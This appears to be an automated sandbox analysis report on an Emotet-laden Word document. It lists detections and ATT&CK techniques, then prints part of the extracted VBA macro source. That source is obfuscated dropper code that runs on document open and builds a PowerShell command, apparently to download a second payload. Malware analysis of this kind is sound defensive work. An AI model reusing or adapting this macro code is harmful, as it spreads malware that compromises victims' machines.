Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers the execution of the 'Shell()' function, which is a critical finding. ClamAV also identified this as Emotet, a known downloader family. The VBA code appears to construct and execute a command, likely for downloading a secondary payload.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6877387-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6877387-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34378 bytes | c703ce42fb1bd5af4d545b2ea2221073e7f61f1ecffb61c8d924a8e1e93e6cc2 |
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "JaiaQVojf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
kOhVoc = (56231 + jEFNpq / (10751 + CKSRsw))
RnjVa = (75958 + oCMEUs / (59501 + ahsvJz))
LskzA = (23602 + MLcpC / (44497 + QiLQb))
wiZiCw = (64024 + zTvqtI / (60967 + BojSrp))
jpVEOuHSRlT = Application.Run("QLcNwiVpEY", "" + fXQTYXA + bEAwHJtKQLclk + WwJffLf + MdPizjV + ioKiwd + zcjUP + ZYSfdOBo + GawHTvKq + VUlBosQW + StfwinVTi + AMuMXzRP + HbZQL + WkzjQUIP + NKQzNbTLJ)
dRlrK = (55008 + wjIKHb / (61905 + hMiwm))
vRckqT = (84186 + dKYus / (37498 + pGrNR))
End Sub
Attribute VB_Name = "DDpRztH"
Function WwJffLf()
On Error Resume Next
HAIPi = 81049 / TvpIv * XzhVY + PIEzw + 27452 / jjpkjh * jPQCNi / TBtPP * (XjFHY / 9226 + 71250 / wCAKAh)
VzLGsRtz = "" + LFaPpHjiIqM + LkiHaCih + "PoWE" + wvmNQsMBCnX + prhZWdQO + "rsh" + pqPctGDBwzaiT + SmvoKHjdbtQsdI + "eLL" + QYHwWAPTuwmahi + ifDrUaNjFM + " "
cNatsD = (20242 / 12501 * (GWSWc * MVJwti - OwENbq / aqKNj * (83030 + 63361 / 47002 - idXELX)))
cqjOQB = "" + sjBLwQuAjw + icUwlQMFqkMnb + Chr(34) + " ( " + VijrpTsjJ + utTfHiwFD + "'36"
WwJffLf = "" + HaGvfiH + kVwYWCHmU + VzLGsRtz + KnXWSmKdirWXQS + ltnNbpu + cqjOQB
vuJEa = (20041 / 70192 * (HsUDk * tUdpWN - hFzwWs / ZRVtsz * (44796 + 82943 / 2114 - DjmGJ)))
DAQut = (96047 / 1210 * (RaNpJ * ESDrp - aKmFC / Elqbr * (47292 + 59454 / 94240 - VbmjTU)))
End Function
Function MdPizjV()
On Error Resume Next
JBrRz = (27846 / 66036 * (TDbsN * rZtPh - ipKMOj / RLWCEj * (29469 + 92917 / 2072 - nmbsdF)))
cKzlVE = (53518 / 52363 * (ZzsJB * IVbjo - kHnpoz / wBEHLY * (74343 + 62023 / 1164 - HBVdb)))
BHQvG = (51519 / 10071 * (lpUqiC * XRCzB - IwOqz / dFwEj * (67931 + 83939 / 25561 - aWFvwQ)))
aRfkCNHzz = "" + RZRwZVjJqr + vhHjiGVq + "q106" + OYIBUiTGIwtU + dAcjaBiudq + "f105" + uozVnDnjKto + wpjiEQb + "w9" + DiimQfDTuRdu + HnKqjqNkLDi + "9z6" + wMZZwQLk + BmIdqwXuGKKbu + "1q11"
vTVTTa = (7818 / 78696 * (EHVrh * cumzJD - MXlnJ / QBXRfz * (1506 + 92772 / 80798 - BQzzp)))
cfNciP = zkWXGz * fRcYRh * qsjhmd - jLFino - (Ivwil * Tucdps / WzUZXs + mnhuvm)
nujJVSzRv = "" + QpTIYXVdpf + vQDsutOhrj + "0%1" + wVVODnzdDVLnWj + drkrtWrWdCAspj + "01" + iXMCCHZBjVSZ + WKiPDzwSC + "!1" + wkBmGnUoaJw + wWRiLXDR + "19" + jqJafhoLV + DWYPZhwliG + "m45z"
bShiOH = WMhWVw * NoGmzd * jtAtSl - EjmIID - (HwzZEq * LWzCT / TKirIu + rZjov)
SjuOMs = FqHMt * WXWAqz * WuCvz - CriRK - (iCwfcl * aOOTWf / GfTCj + vNRYdz)
fNmAb = "" + WWZwiLlZstOAY + afPlHWXf + "11" + iUkYCdWs + ruazCVFbIRzWT + "1m98" + zjdqTzrojzqAAq + IoBRfFSilRwXS + "f10" + BbaEutBQ + GqzLVFk + "6V10" + oiRrSrQuFC + VUnpYZlWwH + "1f" + RZPVWQLL + adjkIMdwwOpjk + "99%" + WwfwWbhK + tcvYoqrpctK + "116w"
RZszLJ = lotLA * jMHRt * aJPki - HXwqIc - (QHOZic * AppFj / YUKihL + rfiCp)
RViOhsnSGTB = "" + lUufQMj + ndpWSlUJA + "32c7" + mNUIzcH + LkUCSOUuZSX + "8q1" + rrEWdYtK + LWRXAlioEwjGC + "01" + DEQZkibNdWdE + jrSTwJfBqUJqiS + "G116" + loujZUdkHF + nBXjHpVG + "V46%" + FzGCNvQtDJXE + JqYPNhLqZWOoz + "87f1" + pzjHwivdXHhU + aliRiWQ + "01%9" + tjaOajn + oKOLozlFONBIjN + "8w" + zkjXOFSYrqYXT + kijfEnOzlfdIDP + "67"
Wdabz = Ajirp * zYNlt * QZwht - kmvsk - (PJtdCu * tucizz / wuAMR + OjwYQo)
qMMIw = cjaUWT * zYorwk * Cpmjas - fKVNNK - (CiQZA * jRUjp / AOKKhT + CWBad)
boNazbTKizi = "" + zVFHIJX + XRwYzkVGtcrUU + "V1"
tJHzBH = ruJmvP * jpdRT * QXfFmj - jFOic - (RNzBa * jkZBPL / FhMnOD + NYWiC)
bHVOWEOSPV = "" + ElfbJZwLhnCVk + VPtwamWSzicIs + "08%1" + zPaufnVoCP + fzMhPKhAOI + "05" + ChTjwjRFTNnmvq + AbrhSPr + "c1" + zMzLrFrBfswUp + wCCSMZlZni + "01%1" + RjcmqAszUTtcH + QzYiKiVjPNZG + "10%" + mKhqSaUC + TwtBiJZK + "116G" + VcPvpEvzMYQui + JMloVROqQONp + "59" + GnOpaqK + BNfXphrZRFUV + "m36"
WvWHlz = (bObtGl / FEwWO - kbqtYI * pvjzi) * (zstDj + vEZwD - 57544 + woUNIz)
hLcbnphmw = "" + vFcicar + cKvlKLANwSW + "z70q" + mQoM
... (truncated)